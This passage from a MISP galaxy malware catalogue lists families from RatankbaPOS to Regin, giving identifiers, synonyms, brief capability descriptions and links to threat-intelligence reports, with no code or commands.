which can be used as unique global reference for RatankbaPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RATel
Internal MISP references
UUID 56ac6980-4db4-4bac-8f8a-cebf5ead6308
which can be used as unique global reference for RATel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel - webarchive
- https://github.com/FrenchCisco/RATel - webarchive
- https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966 - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RatSnif
Internal MISP references
UUID 2f700b52-4379-4b53-894b-1823e34ae71d
which can be used as unique global reference for RatSnif
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RAWDOOR
Internal MISP references
UUID 4dd64925-a899-42ed-ae79-49030cd6d419
which can be used as unique global reference for RAWDOOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RawPOS
Internal MISP references
UUID 80f87001-ff40-4e33-bd12-12ed1a92d1d7
which can be used as unique global reference for RawPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos - webarchive
- https://www.youtube.com/watch?v=fevGZs0EQu8 - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite - webarchive
- https://threatvector.cylance.com/en_us/home/rawpos-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Razy
Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.
Internal MISP references
UUID 6293085e-55c7-4026-8c98-1fa489692d4e
which can be used as unique global reference for Razy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RC2FM
A family identified by ESET Research in the InvisiMole campaign.
Internal MISP references
UUID 165f385f-8507-4cd3-9afd-911a016b2d29
which can be used as unique global reference for RC2FM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RCS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RCS.
Known Synonyms |
---|
Crisis |
Remote Control System |
Internal MISP references
UUID c359c74e-4155-4e66-a344-b56947f75119
which can be used as unique global reference for RCS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs - webarchive
- http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
- https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/ - webarchive
- https://www.f-secure.com/documents/996508/1030745/callisto-group - webarchive
- https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf - webarchive
- https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/ - webarchive
- https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/? - webarchive
- https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/ - webarchive
- https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf - webarchive
- http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RCtrl
Internal MISP references
UUID 40eff712-4812-4b8a-872d-7c9f4b7a8d72
which can be used as unique global reference for RCtrl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rdasrv
Internal MISP references
UUID 1bf3469a-b9c8-497a-bcbb-b1095386706a
which can be used as unique global reference for rdasrv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RDAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RDAT.
Known Synonyms |
---|
GREYSTUFF |
Internal MISP references
UUID 69798a1e-1caf-4bc8-b4af-6508d8a26717
which can be used as unique global reference for RDAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ReactorBot
Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.
Internal MISP references
UUID 9d58d94f-6885-4a38-b086-b9978ac62c1f
which can be used as unique global reference for ReactorBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot - webarchive
- http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/ - webarchive
- https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under - webarchive
- http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Reaver
Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.
Internal MISP references
UUID 826c31ca-2617-47e4-b236-205da3881182
which can be used as unique global reference for Reaver
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver - webarchive
- https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html - webarchive
- https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RecordBreaker
This malware is a successor to Raccoon Stealer (also referred to as Raccoon Stealer 2.0); it is, however, a full rewrite in C/C++.
Internal MISP references
UUID 812fbee2-6f12-4dca-a205-d317fb9065bb
which can be used as unique global reference for RecordBreaker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker - webarchive
- https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/ - webarchive
- https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/ - webarchive
- https://d01a.github.io/raccoon-stealer/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.cybercrimediaries.com/post/russian-language-cybercriminal-forums-analyzing-the-most-active-and-renowned-communities - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family - webarchive
- https://asec.ahnlab.com/en/52072/ - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b - webarchive
- https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8 - webarchive
- https://www.youtube.com/watch?v=NI_Yw2t9zoo - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/ - webarchive
- https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/ - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedAlpha
Internal MISP references
UUID 6be9eee4-ee99-4ad6-bee3-2365d7b37a88
which can be used as unique global reference for RedAlpha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedCap
According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses them to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. Trend Micro also observed that the threat actors relay these emails via government Exchange Servers using valid accounts with stolen passwords.
Internal MISP references
UUID c1ba2ad1-70d9-4833-ac15-18fb8d0a2408
which can be used as unique global reference for RedCap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedCurl
Internal MISP references
UUID 913d3007-9c2b-4c1c-b3a6-2ecb736bc338
which can be used as unique global reference for RedCurl
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl - webarchive
- https://go.group-ib.com/report-redcurl-en?_gl=1t8hou9_gaMTY4NTg1NzA4Ny4xNzA4MDk1MjMx_ga_QMES53K3Y2*MTcwODA5NTIzMC4xLjEuMTcwODA5NjAyNy45LjAuMA.. - webarchive
- https://go.group-ib.com/report-redcurl-awakening-en - webarchive
- https://bi.zone/eng/expertise/blog/red-wolf-vnov-shpionit-za-kommercheskimi-organizatsiyami/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedEnergy Stealer
According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities. The name of the malware was kept due to the common method names observed during the analysis.
Internal MISP references
UUID b5cbe5c8-8cda-43af-bd67-99dcbd9e0dbf
which can be used as unique global reference for RedEnergy Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedLeaves
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedLeaves.
Known Synonyms |
---|
BUGJUICE |
Internal MISP references
UUID a70e93a7-3578-47e1-9926-0818979ed866
which can be used as unique global reference for RedLeaves
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves - webarchive
- http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves - webarchive
- https://www.jpcert.or.jp/magazine/acreport-redleaves.html - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware - webarchive
- https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/ - webarchive
- https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf - webarchive
- http://blog.macnica.net/blog/2017/12/post-8c22.html - webarchive
- http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-117A - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedLine Stealer
RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedLine Stealer.
Known Synonyms |
---|
RECORDSTEALER |
Internal MISP references
UUID ff18a858-7778-485c-949b-d28d867d1ffb
which can be used as unique global reference for RedLine Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer - webarchive
- https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ - webarchive
- https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 - webarchive
- https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://medium.com/@idan_malihi/redline-stealer-malware-analysis-76506ef723ab - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/ - webarchive
- https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ - webarchive
- https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/ - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
- https://www.youtube.com/watch?v=05-1Olqf6qw - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers - webarchive
- https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/ - webarchive
- https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become - webarchive
- https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns - webarchive
- https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html - webarchive
- https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html - webarchive
- https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/ - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://securityscorecard.com/research/detailed-analysis-redline-stealer - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html - webarchive
- https://blog.avast.com/adobe-acrobat-sign-malware - webarchive
- https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack - webarchive
- https://cyber-anubis.github.io/malware%20analysis/redline/ - webarchive
- https://labs.k7computing.com/index.php/credential-stealer-redline-reemerges/ - webarchive
- https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign - webarchive
- https://unit42.paloaltonetworks.com/lapsus-group/ - webarchive
- https://muha2xmad.github.io/malware-analysis/fullredline/ - webarchive
- https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware - webarchive
- https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html - webarchive
- https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/ - webarchive
- https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf - webarchive
- https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html - webarchive
- https://www.youtube.com/watch?v=NI_Yw2t9zoo - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://asec.ahnlab.com/en/30445/ - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904 - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://embee-research.ghost.io/identifying-risepro-panels-using-censys/ - webarchive
- https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/ - webarchive
- https://embee-research.ghost.io/yara-rule-development-il-instructions-in-redline-malware/ - webarchive
- https://therecord.media/scattered-spider-ransomware-attacks-hospitality-retail - webarchive
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution - webarchive
- https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/ - webarchive
- https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://blog.netlab.360.com/purecrypter - webarchive
- https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing - webarchive
- https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/ - webarchive
- https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://embeeresearch.io/redline-stealer-basic-static-analysis-and-c2-extraction/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/ - webarchive
- https://securityscorecard.pathfactory.com/all/a-detailed-analysis - webarchive
- https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - webarchive
- https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ - webarchive
- https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ - webarchive
- https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download - webarchive
- https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/ - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://russianpanda.com/2023/11/20/MetaStealer-Redline's-Doppelganger/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/ - webarchive
- https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/ - webarchive
- https://asec.ahnlab.com/ko/25837/ - webarchive
- https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882 - webarchive
- https://research.checkpoint.com/2024/stargazers-ghost-network/ - webarchive
- https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer - webarchive
- https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software - webarchive
- https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/ - webarchive
- https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore - webarchive
- https://www.secureworks.com/research/darktortilla-malware-analysis - webarchive
- https://unit42.paloaltonetworks.com/bluesky-ransomware/ - webarchive
- https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/ - webarchive
- https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf - webarchive
- https://securelist.com/malvertising-through-search-engines/108996/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://medium.com/@the_abjuri5t/advice-for-catching-a-redline-stealer-dca126867193 - webarchive
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem - webarchive
- https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service - webarchive
- https://asec.ahnlab.com/en/35981/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer - webarchive
- https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Redosdru
Internal MISP references
UUID eb7a5417-ebbe-42c9-834b-2412a7e338f1
which can be used as unique global reference for Redosdru
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
REDPEPPER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REDPEPPER.
Known Synonyms |
---|
Adupib |
Internal MISP references
UUID 42fc1cf4-23ee-47a6-bdd3-7dc824948ba7
which can be used as unique global reference for REDPEPPER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedRum
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedRum.
Known Synonyms |
---|
Grinch |
Thanos |
Tycoon |
Internal MISP references
UUID cbb4cfd8-3642-4b04-a199-8e9b4b80fb62
which can be used as unique global reference for RedRum
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
REDSALT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REDSALT.
Known Synonyms |
---|
Dipsind |
Internal MISP references
UUID da2210c7-c953-4367-9f4b-778e77af7ce7
which can be used as unique global reference for REDSALT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt - webarchive
- https://twitter.com/ItsReallyNick/status/1136502701301346305 - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
REDSHAWL
REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.
Internal MISP references
UUID 799cce43-6ba0-4e21-9a63-f8b7f9bb7cc4
which can be used as unique global reference for REDSHAWL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Redyms
Internal MISP references
UUID 36893c2a-28ad-4dd3-a66b-906f1dd15b92
which can be used as unique global reference for Redyms
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Red Alert
Internal MISP references
UUID cd5f5165-7bd3-4430-b0bc-2c8fa518f618
which can be used as unique global reference for Red Alert
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Red Gambler
Internal MISP references
UUID ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7
which can be used as unique global reference for Red Gambler
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
reGeorg
Internal MISP references
UUID 9ee0eb87-7648-4581-b301-7472a48946ad
which can be used as unique global reference for reGeorg
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg - webarchive
- https://cert.gov.ua/article/6278706 - webarchive
- https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF - webarchive
- https://www.secureworks.com/research/samsam-ransomware-campaigns - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
- https://www.welivesecurity.com/2022/09/06/worok-big-picture/ - webarchive
- https://www.secureworks.com/blog/ransomware-deployed-by-adversary - webarchive
- https://blog.talosintelligence.com/new-zardoor-backdoor/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://sensepost.com/discover/tools/reGeorg/ - webarchive
- https://github.com/sensepost/reGeorg - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Regin
Regin is a sophisticated malware and hacking toolkit attributed to the United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, including telecom, government, and financial institutions. It was engineered to be modular, and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations, including private companies, government entities, and research institutes.
Internal MISP references
UUID 4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb
which can be used as unique global reference for Regin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.regin - webarchive
- https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf - webarchive
